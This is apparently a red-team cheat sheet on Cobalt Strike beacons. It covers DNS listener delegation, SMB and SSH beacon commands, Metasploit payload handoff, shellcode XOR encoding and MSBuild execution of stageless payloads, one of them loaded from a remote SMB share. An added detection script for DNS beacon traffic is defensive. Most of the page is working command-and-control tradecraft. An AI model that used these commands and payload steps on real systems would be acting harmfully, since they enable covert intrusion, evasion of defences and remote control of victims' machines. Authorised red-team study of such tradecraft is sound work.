Cobalt Strike - Beacons
DNS Beacon
DNS Configuration
- Edit the Zone File for the domain
- Create an A record for Cobalt Strike system
- Create an NS record that points to FQDN of your Cobalt Strike system
Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a DNS A record and point it to your Cobalt Strike team server. Use DNS NS records to delegate several domains or sub-domains to your Cobalt Strike team server's A record.
Example of DNS on Digital Ocean:
NS example.com directs to 10.10.10.10. 86400
NS polling.campaigns.example.com directs to campaigns.example.com. 3600
A campaigns.example.com directs to 10.10.10.10 3600
After creating a DNS listener (Beacon DNS), verify that your domains resolve to 0.0.0.0:
nslookup jibberish.beacon polling.campaigns.domain.com
nslookup jibberish.beacon campaigns.domain.com
If you have trouble with DNS, you can stop and disable the systemd-resolved service and force Google DNS nameservers:
systemctl disable systemd-resolved
systemctl stop systemd-resolved
rm /etc/resolv.conf
echo "nameserver 8.8.8.8" > /etc/resolv.conf
echo "nameserver 8.8.4.4" >> /etc/resolv.conf
DNS Redirector
Debug the DNS queries with tcpdump -l -n -s 5655 -i eth0 udp port 53.
DNS Mode
Mode | Description |
---|---|
mode dns-txt | DNS TXT record data channel (default) |
mode dns | DNS A record data channel |
mode dns6 | DNS AAAA record channel |
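
Seen from the resolver side, the delegation and data channels described above leave a recognizable pattern: one client querying many distinct labels under a single delegated zone, with A answers of 0.0.0.0. The following detection sketch is an added example, not part of the original page; the log format, function names and thresholds are assumptions, and the sample log is constructed.

```python
from collections import defaultdict

IDLE_ANSWER = "0.0.0.0"            # answer the page expects from the DNS listener
DATA_TYPES = {"A", "AAAA", "TXT"}  # record types of the dns, dns6 and dns-txt modes

# Constructed resolver log, one query per line: <client> <qtype> <qname> <answer>
SAMPLE_LOG = """\
10.0.0.5 A www.example.org 93.184.216.34
10.0.0.7 A 1f2a9c.polling.campaigns.example.com 0.0.0.0
10.0.0.7 A 77be01.polling.campaigns.example.com 0.0.0.0
10.0.0.7 TXT a91c33.polling.campaigns.example.com "constructed-data"
10.0.0.7 TXT c04d18.polling.campaigns.example.com "constructed-data"
10.0.0.7 A 5e6f70.polling.campaigns.example.com 0.0.0.0
10.0.0.9 A mail.example.org 93.184.216.40
10.0.0.9 TXT example.org "v=spf1 -all"
"""

def parse(line):
    """Split one log line into (client, qtype, qname, answer)."""
    client, qtype, qname, answer = line.split(maxsplit=3)
    return client, qtype.upper(), qname.rstrip(".").lower(), answer

def find_suspects(log_text, min_unique=4, min_idle=2):
    """Return (client, zone) pairs that look like a DNS data channel.

    A pair is flagged when the client asked for at least `min_unique`
    distinct leftmost labels under the zone and at least `min_idle`
    A answers were 0.0.0.0. Both thresholds are illustrative assumptions.
    """
    stats = defaultdict(lambda: {"labels": set(), "idle": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, qtype, qname, answer = parse(line)
        if qtype not in DATA_TYPES or "." not in qname:
            continue
        label, zone = qname.split(".", 1)   # leftmost label vs. parent zone
        entry = stats[(client, zone)]
        entry["labels"].add(label)
        if qtype == "A" and answer == IDLE_ANSWER:
            entry["idle"] += 1
    return sorted(
        key for key, e in stats.items()
        if len(e["labels"]) >= min_unique and e["idle"] >= min_idle
    )

if __name__ == "__main__":
    for client, zone in find_suspects(SAMPLE_LOG):
        print(f"review: {client} -> *.{zone}")
```

Tune the thresholds against a baseline of your own resolver logs before alerting on the result.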
SMB Beacon
SMB Beacon uses Named Pipes. You might encounter these error codes while running it.
Error Code | Meaning | Description |
---|---|---|
2 | File Not Found | There is no beacon for you to link to |
5 | Access is denied | Invalid credentials or you don't have permission |
53 | Bad Netpath | You have no trust relationship with the target system. There may or may not be a beacon there. |
SSH Beacon
# deploy a beacon
beacon> help ssh
Use: ssh [target:port] [user] [pass]
Spawn an SSH client and attempt to login to the specified target
beacon> help ssh-key
Use: ssh [target:port] [user] [/path/to/key.pem]
Spawn an SSH client and attempt to login to the specified target
# beacon's commands
upload Upload a file
download Download a file
socks Start SOCKS4a server to relay traffic
sudo Run a command via sudo
rportfwd Setup a reverse port forward
shell Execute a command via the shell
Metasploit compatibility
- Payload: windows/meterpreter/reverse_http or windows/meterpreter/reverse_https
- Set LHOST and LPORT to the beacon
- Set DisablePayloadHandler to True
- Set PrependMigrate to True
exploit -j
Custom Payloads
* Attacks > Packages > Payload Generator
* Attacks > Packages > Scripted Web Delivery (S)
$ python2 ./shellcode_encoder.py -cpp -cs -py payload.bin MySecretPassword xor
$ C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\dns_raw_stageless_x64.xml
$ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\dns_raw_stageless_x86.xml